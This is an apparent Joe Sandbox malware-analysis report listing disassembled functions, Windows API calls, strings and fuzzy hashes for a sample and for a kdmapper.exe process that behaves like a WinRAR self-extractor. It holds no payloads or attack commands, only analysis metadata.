Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task
String ID:
API String ID: 326894585-0
Opcode ID: fcc1ca9201f93cfaf03321edb2ee6a7dc1da45cc735778481c8395ba575dfbe3
Instruction ID: 5894171e5dc5be173c45c21995e74a74d689375700c85ac61a0f0d673f6b7217
Opcode Fuzzy Hash: fcc1ca9201f93cfaf03321edb2ee6a7dc1da45cc735778481c8395ba575dfbe3
Instruction Fuzzy Hash: B521C423B1D746C9EA66BB11E4883B81194AF047F4F584B30DE6D867D7DE7CE5828300

Function 00007FF67418DA10 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FF67418DA59
GetLastError.KERNEL32 ref: 00007FF67418DA67
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF67418ABC4), ref: 00007FF67418DA9C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF67418ABC4), ref: 00007FF67418DAAA

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: 7a3a7f74f73a46a99d90448da18f6bb105881046ef5d0e6d42425b993442300c
Instruction ID: 0104b41075fdb2773f242883cdb59ab6eeef3317c7f322011cedf0bb7c70260f
Opcode Fuzzy Hash: 7a3a7f74f73a46a99d90448da18f6bb105881046ef5d0e6d42425b993442300c
Instruction Fuzzy Hash: 3A212977A28B85C6E3109F11E48832EBBB8F799B94F244238DB8993B55DF3DD4418B00

Function 00007FF674152130 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF674151F40: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF674151F99

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF67415216B
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF67415217D
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF674152185
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6741521ED

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: __acrt_iob_func__stdio_common_vfprintffclosefflushfree
String ID:
API String ID: 2759974054-0
Opcode ID: 4b8cbb2eab82408cb72d5d77ddd86e032ff70fca4d004e22786f2319a7a853c9
Instruction ID: 0b03cae3bc945467ee69c3d0382f0f3e0eb19a0016294e826539f8f0b39f41ab
Opcode Fuzzy Hash: 4b8cbb2eab82408cb72d5d77ddd86e032ff70fca4d004e22786f2319a7a853c9
Instruction Fuzzy Hash: 31214D67928AC2C1EB55BB61D9CC2B967A0FF84B84F094076CA1DCB254DF3C98C1DB20

Function 00007FF674171400 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF67417140B
__std_exception_copy.VCRUNTIME140 ref: 00007FF674171444

Strings

string too long, xrefs: 00007FF674171404

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: Xlength_error@std@@__std_exception_copy
String ID: string too long
API String ID: 127952674-2556327735
Opcode ID: be8113c23af4f9b38060aa871511fefe5f671834b6e1a0aa4a6fdba527ce7ea1
Instruction ID: 23ca55e40ca55d1decd82df2ebcd885549bec930e7c0f5c48ec29c699718042d
Opcode Fuzzy Hash: be8113c23af4f9b38060aa871511fefe5f671834b6e1a0aa4a6fdba527ce7ea1
Instruction Fuzzy Hash: 87E06D62A24B89D1EF45AF21E8C40B83364EF28B24B44C131DE4C86320EF3CE2E9C300

Function 00007FF674159C40 Relevance: 5.2, APIs: 4, Instructions: 241COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674159CFA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674159D67
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674159FFF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415A020

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 0f9bca17e66ded67b1a504ccdb50fd1236047b62f8f41b41da83b9a65bfd1941
Instruction ID: fb1e15e10d0a8e418e7ad64b90dad658b5a9da19166d8c18b6c78b0eba7e4e75
Opcode Fuzzy Hash: 0f9bca17e66ded67b1a504ccdb50fd1236047b62f8f41b41da83b9a65bfd1941
Instruction Fuzzy Hash: DCB19923E24B95C6E711DB3594882BEB7A4FF99B85F149332EE4592664DF3CE482C700

Function 00007FF6741534D0 Relevance: 5.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6741483EF), ref: 00007FF67415354F
memcpy.VCRUNTIME140(?,?,?,00007FF6741483EF), ref: 00007FF67415356B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6741483EF), ref: 00007FF67415358B
memcpy.VCRUNTIME140(?,?,?,00007FF6741483EF), ref: 00007FF6741535B9

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: memcpy$freemalloc
String ID:
API String ID: 3313557100-0
Opcode ID: a8063b4f172900af7f333b892fdd672f996085ad7b339d79f3029e1be8ffb455
Instruction ID: dac9622f99c7e3eb5bf8da36e9b1aa030ce4d007683f94e2f515a4fb01c5e0af
Opcode Fuzzy Hash: a8063b4f172900af7f333b892fdd672f996085ad7b339d79f3029e1be8ffb455
Instruction Fuzzy Hash: 6B319C73B25A85C6EA14EF1AE5881B8A360FB48B80B089436DF5D87751DF3CE5A1C700

Analysis Process: kdmapper.exePID: 5292, Parent PID: 1476COMMON

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4%
Total number of Nodes:	1467
Total number of Limit Nodes:	44

Executed Functions

Function 0063DF1E Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00630863: GetModuleHandleW.KERNEL32(kernel32), ref: 0063087C
Part of subcall function 00630863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0063088E
Part of subcall function 00630863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 006308BF

Part of subcall function 0063A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0063A655

Part of subcall function 0063AC16: OleInitialize.OLE32(00000000), ref: 0063AC2F
Part of subcall function 0063AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0063AC66
Part of subcall function 0063AC16: SHGetMalloc.SHELL32(00668438), ref: 0063AC70

GetCommandLineW.KERNEL32 ref: 0063DF5C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0063DF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0063DF94
UnmapViewOfFile.KERNEL32(00000000), ref: 0063DFCE

Part of subcall function 0063DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0063DBF4
Part of subcall function 0063DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0063DC30

CloseHandle.KERNEL32(00000000), ref: 0063DFD7
GetModuleFileNameW.KERNEL32(00000000,0067EC90,00000800), ref: 0063DFF2
SetEnvironmentVariableW.KERNEL32(sfxname,0067EC90), ref: 0063DFFE
GetLocalTime.KERNEL32(?), ref: 0063E009
_swprintf.LIBCMT ref: 0063E048
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0063E05A
GetModuleHandleW.KERNEL32(00000000), ref: 0063E061
LoadIconW.USER32(00000000,00000064), ref: 0063E078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0063E0C9
Sleep.KERNEL32(?), ref: 0063E0F7
DeleteObject.GDI32 ref: 0063E130
DeleteObject.GDI32(?), ref: 0063E140
CloseHandle.KERNEL32 ref: 0063E183

Strings

sfxname, xrefs: 0063DFF9
xzg, xrefs: 0063E10B
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 0063E039
winrarsfxmappingfile.tmp, xrefs: 0063DF77
C:\Users\user\Desktop, xrefs: 0063DF33
sfxstime, xrefs: 0063E055
STARTDLG, xrefs: 0063E0BE

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xzg
API String ID: 3049964643-2648067116
Opcode ID: dea5fc19d53d06d1a404d6e6c33e4eafc0c473cb312d55222eba7e20ca53b89b
Instruction ID: 3ac94f266f19bc171eb85e66f9d76485c38fdf453ce760739d8d8d58f9f83202
Opcode Fuzzy Hash: dea5fc19d53d06d1a404d6e6c33e4eafc0c473cb312d55222eba7e20ca53b89b
Instruction Fuzzy Hash: EC61F171904315AFD320AFB0EC49E6B3BEBEB45B45F00142DF945923A1DFB49944CBA2

Function 0063A6C2 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0063B73D,00000066), ref: 0063A6D5
SizeofResource.KERNEL32(00000000,?,?,?,0063B73D,00000066), ref: 0063A6EC
LoadResource.KERNEL32(00000000,?,?,?,0063B73D,00000066), ref: 0063A703
LockResource.KERNEL32(00000000,?,?,?,0063B73D,00000066), ref: 0063A712
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0063B73D,00000066), ref: 0063A72D
GlobalLock.KERNEL32(00000000), ref: 0063A73E
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0063A762
GlobalUnlock.KERNEL32(00000000), ref: 0063A7C6

Part of subcall function 0063A626: GdipAlloc.GDIPLUS(00000010), ref: 0063A62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0063A7A7
GlobalFree.KERNEL32(00000000), ref: 0063A7CD

Strings

PNG, xrefs: 0063A6C6
F0wnc, xrefs: 0063A762

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
String ID: F0wnc$PNG
API String ID: 211097158-4205786495
Opcode ID: 5c10b15c90fb94a558ab2e203317788206cfb94373d44b09b789960915f2f0ac
Instruction ID: ee7c7b5c874d0f1d5ffe6eb0b81d6eeea53d46bff411096caebf2c87912a3c52
Opcode Fuzzy Hash: 5c10b15c90fb94a558ab2e203317788206cfb94373d44b09b789960915f2f0ac
Instruction Fuzzy Hash: A931E279600712AFC7219F71EC88D5BBBBBEF85B91F040518F84682320EB31DD40EAA1

Function 0062A69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0062A592,000000FF,?,?), ref: 0062A6C4

Part of subcall function 0062BB03: _wcslen.LIBCMT ref: 0062BB27

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0062A592,000000FF,?,?), ref: 0062A6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0062A592,000000FF,?,?), ref: 0062A6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,0062A592,000000FF,?,?), ref: 0062A728
GetLastError.KERNEL32(?,?,?,?,0062A592,000000FF,?,?), ref: 0062A734

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: 490c5b878ae7ff37d88e4cd9bd5798ce2206529ebbad8ab1d3973b15d301d8db
Instruction ID: 3581be98821fe446f1820e2dfbc4d89f17c8872db530880176fe61e45a8a8eaf
Opcode Fuzzy Hash: 490c5b878ae7ff37d88e4cd9bd5798ce2206529ebbad8ab1d3973b15d301d8db
Instruction Fuzzy Hash: 5141B276500625ABCB25DFA8DC84AEAF3BAFF48350F00419AE55EE3240D7746E90CF94

Function 00647DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,00647DC4,00000000,0065C300,0000000C,00647F1B,00000000,00000002,00000000), ref: 00647E0F
TerminateProcess.KERNEL32(00000000,?,00647DC4,00000000,0065C300,0000000C,00647F1B,00000000,00000002,00000000), ref: 00647E16
ExitProcess.KERNEL32 ref: 00647E28

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 76b34a20b511d534062522bc462ab5831a8f4d6583a834fbb9bc0b6d6b97e2a8
Instruction ID: 051c2532f58269f2c48c7d5f500ac406ac61befb70a47ca7d4481d5231a99333
Opcode Fuzzy Hash: 76b34a20b511d534062522bc462ab5831a8f4d6583a834fbb9bc0b6d6b97e2a8
Instruction Fuzzy Hash: 07E04631000348ABCF12BF20CD09A8A3F6BEB00B82F004458F8098B232CB36DE52CA84

Function 0062848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00628493

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e4c357169e4a79ce77e3149292a8bace4a8c0dcccac469c69af62e211cd89394
Instruction ID: d361c968cb6fbaef0f75be374a5a9f9640d6757e14a13d778e6b0622297a08bf
Opcode Fuzzy Hash: e4c357169e4a79ce77e3149292a8bace4a8c0dcccac469c69af62e211cd89394
Instruction Fuzzy Hash: 45822C70905A65AEDF15DF64DC91BFAB7BBAF05300F0841B9E8499B342CB315A89CF60

Function 0063B7E0 Relevance: 107.5, APIs: 48, Strings: 13, Instructions: 731windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0063B7E5

Part of subcall function 00621316: GetDlgItem.USER32(00000000,00003021), ref: 0062135A
Part of subcall function 00621316: SetWindowTextW.USER32(00000000,006535F4), ref: 00621370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0063B8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0063B8EF
IsDialogMessageW.USER32(?,?), ref: 0063B902
TranslateMessage.USER32(?), ref: 0063B910
DispatchMessageW.USER32(?), ref: 0063B91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0063B93D
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0063B960
GetDlgItem.USER32(?,00000068), ref: 0063B983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0063B99E
SendMessageW.USER32(00000000,000000C2,00000000,006535F4), ref: 0063B9B1

Part of subcall function 0063D453: _wcschr.LIBVCRUNTIME ref: 0063D45C
Part of subcall function 0063D453: _wcslen.LIBCMT ref: 0063D47D

SetFocus.USER32(00000000), ref: 0063B9B8
_swprintf.LIBCMT ref: 0063BA24

Part of subcall function 00624092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006240A5

Part of subcall function 0063D4D4: GetDlgItem.USER32(00000068,0067FCB8), ref: 0063D4E8
Part of subcall function 0063D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0063AF07,00000001,?,?,0063B7B9,0065506C,0067FCB8,0067FCB8,00001000,00000000,00000000), ref: 0063D510
Part of subcall function 0063D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0063D51B
Part of subcall function 0063D4D4: SendMessageW.USER32(00000000,000000C2,00000000,006535F4), ref: 0063D529
Part of subcall function 0063D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0063D53F
Part of subcall function 0063D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0063D559
Part of subcall function 0063D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0063D59D
Part of subcall function 0063D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0063D5AB
Part of subcall function 0063D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0063D5BA
Part of subcall function 0063D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0063D5E1
Part of subcall function 0063D4D4: SendMessageW.USER32(00000000,000000C2,00000000,006543F4), ref: 0063D5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0063BA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0063BA90
GetTickCount.KERNEL32 ref: 0063BAAE
_swprintf.LIBCMT ref: 0063BAC2
GetLastError.KERNEL32(?,00000011), ref: 0063BAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0063BB43
_swprintf.LIBCMT ref: 0063BB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0063BBD0
GetCommandLineW.KERNEL32 ref: 0063BBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0063BC47
ShellExecuteExW.SHELL32(0000003C), ref: 0063BC6F
Sleep.KERNEL32(00000064), ref: 0063BCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0063BCE2
CloseHandle.KERNEL32(00000000), ref: 0063BCEB
_swprintf.LIBCMT ref: 0063BD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0063BD7D
SetDlgItemTextW.USER32(?,00000065,006535F4), ref: 0063BD94
GetDlgItem.USER32(?,00000065), ref: 0063BD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 0063BDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0063BDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0063BE68
_wcslen.LIBCMT ref: 0063BEBE
_swprintf.LIBCMT ref: 0063BEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 0063BF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0063BF4C
GetDlgItem.USER32(?,00000068), ref: 0063BF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0063BF6B
GetDlgItem.USER32(?,00000066), ref: 0063BF85
SetWindowTextW.USER32(00000000,0066A472), ref: 0063BFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0063C007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0063C01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0063C0BD
EnableWindow.USER32(00000000,00000000), ref: 0063C197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0063C1D9

Part of subcall function 0063C73F: __EH_prolog.LIBCMT ref: 0063C744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0063C1FD

Strings

LICENSEDLG, xrefs: 0063C0B2
<, xrefs: 0063BB84
Qe, xrefs: 0063BBBC
__tmp_rar_sfx_access_check_%u, xrefs: 0063BAB5
hc, xrefs: 0063BCA5
"%s"%s, xrefs: 0063BD0D
%s, xrefs: 0063BED8
winrarsfxmappingfile.tmp, xrefs: 0063BBA6
C:\Users\user\Desktop, xrefs: 0063BBC9
-el -s2 "-d%s" "-sp%s", xrefs: 0063BB6B
^c, xrefs: 0063C1E1
@, xrefs: 0063BB91
STARTDLG, xrefs: 0063B801

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
